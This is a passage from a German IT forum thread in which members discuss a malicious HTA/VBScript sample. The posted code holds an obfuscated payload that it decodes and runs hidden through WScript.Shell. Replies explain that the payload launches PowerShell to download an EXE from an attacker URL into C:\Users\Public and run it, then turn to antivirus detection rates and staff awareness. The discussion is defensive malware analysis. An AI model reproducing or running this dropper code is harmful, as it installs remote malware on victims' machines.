    End Function

    Function TaxhEpkSsiupfA()
        Dim xbZuLutP
        Dim JeFugEc
        Dim ArjFeoNni
        Dim BWeKrnacwCPvJ
        Dim odBxqfFoyO

        Dim GjzjzpbRUu
        Dim ikTHOjnXN
        Dim JtPon
        Dim sDaoqr
        Dim zKJoEXQ
        Dim ZjQtmyV
        Dim wqLPxt

        JeFugEc = "HTML"  
        xbZuLutP = "EFG@ABCLMNOHIJKTUVWPQRS\]^efg`abclmnohijktuvwpqrs|}~45670123<=/+"  
        xbZuLutP = POWFfvlDUGnQKML(xbZuLutP, JeFugEc)
        ArjFeoNni = "c@G93ZX*JzaGVs#bC5leG@UgLUV#4ZWN1d*Glvb*lBv@bGl*jeS@BVbl@Jlc3Ry@aWN0ZW#QgLVdp@bmRvdy*AxI@Ft2b#2lkX*SAkbn@VsbDsk@a2xmeW*Ntc*Hdie#G4gPSB*HZXQt@UmFuZG#9tIC*1Na*W4gMy#AtTW@F4ID#Q7JH*RnaGJy*a3NjID#0gK#Ftja@GFyW11*dKFt#jaGFyX#Tk3Li*5bY2h@hcl@0xM#jIpKTs@kbGRle@mlr#ID0gLW*pva#W4g*KCR0@Z2hic*mtz#YyB8I*Edl@dC1SYW@5kb2*0gLUN#vdW@50I#CRrb#GZ5Y21@wd2J4@biB8IC#Uge1tD@aGF*yXS@Rff@Sk7JG*5sc3#Zme@msgPS*BbY#2hhc#l0we@DJlK#1tja*GFyXTB*4Nj*UrW2No@YXJdMH#g3OCtb@Y2h*hcl*0we*DY1OyR*jdnho*cHptZ3#NpID0@gJGxk#ZXpp#ayArI*CRubHN@2Zn*prO*yRr@YWNi@dXh*mbD1bY@2hhc@l0we#DUzK1t@jaGF@yXTB4*NjErW*2NoYX#JdMHg0#YzskZW#d5Zn@doc@HFr#PVtj@aGFyX@TB4ND*krW2No*YXJdMH#g0NSt@bY2h@hcl0w@eDU4O@yRzaGt@ueHFv@cj1b*Y2h@hcl0we*DczK#1tja#GFyXT*B4ND*ErW2N*oYXJd*MHg3M#Ctb#Y2hhc#l0w#eDUzO*3NBT#CB4b@HFy#aWp2#ZmttaG@QgJGth*Y2J*1eG@ZsOy@R2d2l#nbnFs*bXh#iPVtj@aGF#yXT#B4NGUr@W2NoY*XJdMHg#2NStb@Y2hh*cl0weD#c0K#1tjaGF*yXTB4M@mUrW@2NoYX#JdMHg#1Ny@tbY2*hhc@l0w#eDY@1K1tj@aGF#yXTB4@NjIr#W2NoY#XJdMH@g0My@tbY*2hhcl0*weDZ@jK1t*jaGFyX*TB4N#jkrW2N*oYXJd*MHg*2NStbY#2hh*cl0we*DZlK1t@jaGF@yXTB4#NzQ7#eGx#xcm@lqd*mZrb#Whk#IGx3e@W5iam*cgJGVn#eWZ3a@HBxaz*skcGh*hd3Nx#b2t*pamM*9W2No*YXJdM*HgyNCt#bY2hhc@l0weD@Y1K@1tj@aGF@yXTB4N*mUrW2N#oYX#JdM@Hg3N#itb*Y2hhcl*0weD#NhK1*tjaGF#yXTB4*NTArW2*NoYXJ*dMHg1N@StbY2*hhcl0w@eDQy*K1tjaG@FyXTB#4NGMrW#2NoY#XJdMH*g0OStb*Y2hhc@l0weD*QzfG#x3eW@5iam*c7eGx*xcm@lqdm@ZrbW@hkI@HJh*Z2J3@aGxt*YyA#kc2hrb@nhxb#3I7J#Ghjbm*pidSA#9ICRwa#GF3c3F*va2@lqYyAr#IFtjaG*FyXTB*4NW#MgKy@AkY3@Z4aH@B6bW@dzaTs*7Ozsk*cnl2am@9iZ*2VwID#0gJ#2FI#UjBjRG*92T@DJkaGV@tRn#pkSEp*wY0*hSb*FlYTmx*MblJ#2Y0M5*MGNpMX#pkR0@ZzYk#dWeUxt*VjR*aUT09*Jzsk*cnl2am#9iZ2@VwP#VtTeXN@0ZW0uV@GV4#dC5F#bmNv#ZGluZ1*06O*lVURj*guR2V0@U3RyaW*5nKFt@TeX*N0ZW0#uQ2@9udmV*ydF*06OkZy@b21CY#XNlN@jRTdHJ@pbm@coJH*J5d#mpvYmd#lcC@kpOyR#oaW1kY*WsgP*SBOZXc*tT2Jq#ZWN0I@CR2d2l#nbn#FsbXhi#OyR0#amR1*b3hmI#D0gJ#Ghp#bWRh@ay5#Eb3d#ubG9h#ZER#hdGEo@JHJ5d*mpvYm@dlcCk#7W0lPL@kZp*bGV*dOjpXc@ml0ZUF#sbE#J5dG*VzKC*RoY2*5qYn@UsI@CR0am@R1b*3hmKT#tyYWd@id2*hsbWM*gJGh#jbmpi#dTs7JG#55a*HNjZHY*gPS#BAKCRw#dW9o#eWV#kY25#6aiwg#JHRza*2VhL*CAka#mZjd@m8sICR#wZml*3Z2wpO#2ZvcmV@hY2#goJG1#4amh6@c2J3eS@Bpb*iAkbnl@oc2*Nkdi*l7J@G51@bGw*gPSAkX#30iIg*=="  
        ArjFeoNni = JpAoAEKRCC(ArjFeoNni)
        BWeKrnacwCPvJ = AujSipdmcfmtIZ(ArjFeoNni, xbZuLutP)
        set odBxqfFoyO = CreateObject("Wscript.Shell")  
        odBxqfFoyO.Run(BWeKrnacwCPvJ),0,true
        self.close()

    End Function

    TaxhEpkSsiupfA()

    Public Function ePsNoAmjtS()
        ePsNoAmjtS = m_zbbHqyFirstSwitch
    End Function
    
    Public Function WekLPwHdDdFxFC(zbbHqy)
        Dim LBbaeCl
        WekLPwHdDdFxFC = ""  
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < kuht.xgKbGthAQu Then
                WekLPwHdDdFxFC = kuht(zbbHqy)
            End If
        End If
    End Function

    Public Function nqqUcB(zbbHqy)
        nqqUcB = False
        If IsNumeric(zbbHqy) Then
            If zbbHqy >=0 And zbbHqy < wesabfgt.xgKbGthAQu Then
                nqqUcB = True
            End If
        End If
    End Function

</script>
</head>
<div> 
</div>   
<body>
</body>
</html>



Virustotal meldet bei der URL nur zwei (von 71) Treffer als "SPAM"!

bei der zipdatei schlagen 22 von 55 als Trojaner an.


lks
Mitglied: 140447
140447 Aug 07, 2019 updated at 11:12:40 (UTC)
Goto Top
Mal schnell analysiert:
Der VBA Code erstellt wieder Powershell-Code führt diesen aus und dieser lädt wieder über verschleierten PS Code diese EXE aus dem Web:
h t t p://gazastriptease.top/tr-staller.exe
nach
C:\Users\Public\qmh.exe
herunter und führt diese aus.

Und nur drei bei Virus-Total sehen die EXE bisher als SPAM oder Malicous an
https://www.virustotal.com/gui/url/1350739e0505e13b17df677b1f2cf948a65ff ...
Member: Penny.Cilin
Penny.Cilin Aug 07, 2019 at 11:14:04 (UTC)
Goto Top
Da gibt sich aber jemand BÖSES wirklich BÖSE Mühe.

@140447
Danke für die schnelle Analyse.

Gruss Penny.
Member: Lochkartenstanzer
Lochkartenstanzer Aug 07, 2019 at 13:03:19 (UTC)
Goto Top
Zitat von @140447:

Mal schnell analysiert:
Der VBA Code erstellt wieder Powershell-Code führt diesen aus und dieser lädt wieder über verschleierten PS Code diese EXE aus dem Web:
h t t p://gazastriptease.top/tr-staller.exe
nach
C:\Users\Public\qmh.exe
herunter und führt diese aus.

danke für das nachforschen. Hatte noch nicht die Zeit, das weiter zu verfolgen.

lks
Mitglied: 140447
140447 Aug 09, 2019 updated at 10:21:11 (UTC)
Goto Top
Jetzt sinds zumindest schon mal 13 Scanner die ihn erkennen. Nachdem ich einigen das Sample mal übermittelt habe.
Member: Lochkartenstanzer
Lochkartenstanzer Aug 09, 2019 at 10:27:30 (UTC)
Goto Top
Zitat von @140447:

Jetzt sinds zumindest schon mal 13 Scanner die ihn erkennen. Nachdem ich einigen das Sample mal übermittelt habe.

Bestätigt meine These, daß Schlangenöl nur vor gut abgehangenem Zeugs schützt.

Viel wichtiger ist die Sensibilisierung der Mitarbeiter und vor allem diesen bewßt zu machen, daß ein Airbag/ABS/ASR Virenscanner kein Grund, einfach darauf zu Vertauen, daß man geschützt. Man muß immer noch das Hirn einschalten, bevor man losfährt/-surft/-klickt.

lks
Mitglied: 140447
140447 Aug 09, 2019 updated at 10:41:25 (UTC)
Goto Top
Jepp, leider besteht die Mehrheit der Mitarbeiter in vielen Fällen aus "RTL"-Zuschauern face-smile, und denen Verstand beizubringen, Lebensaufgabe face-big-smile.
Member: Penny.Cilin
Penny.Cilin Aug 09, 2019 at 10:42:02 (UTC)
Goto Top
Zitat von @140447:

Jepp, leider besteht die Mehrheit der Mitarbeiter in vielen Fällen aus "RTL"-Zuschauern face-smile, und denen Verstand beizubringen, Lebensaufgabe face-big-smile.

Manch einer guggt auch RTL - und wenn's nur die Nachrichten (RTL Aktuell) sind.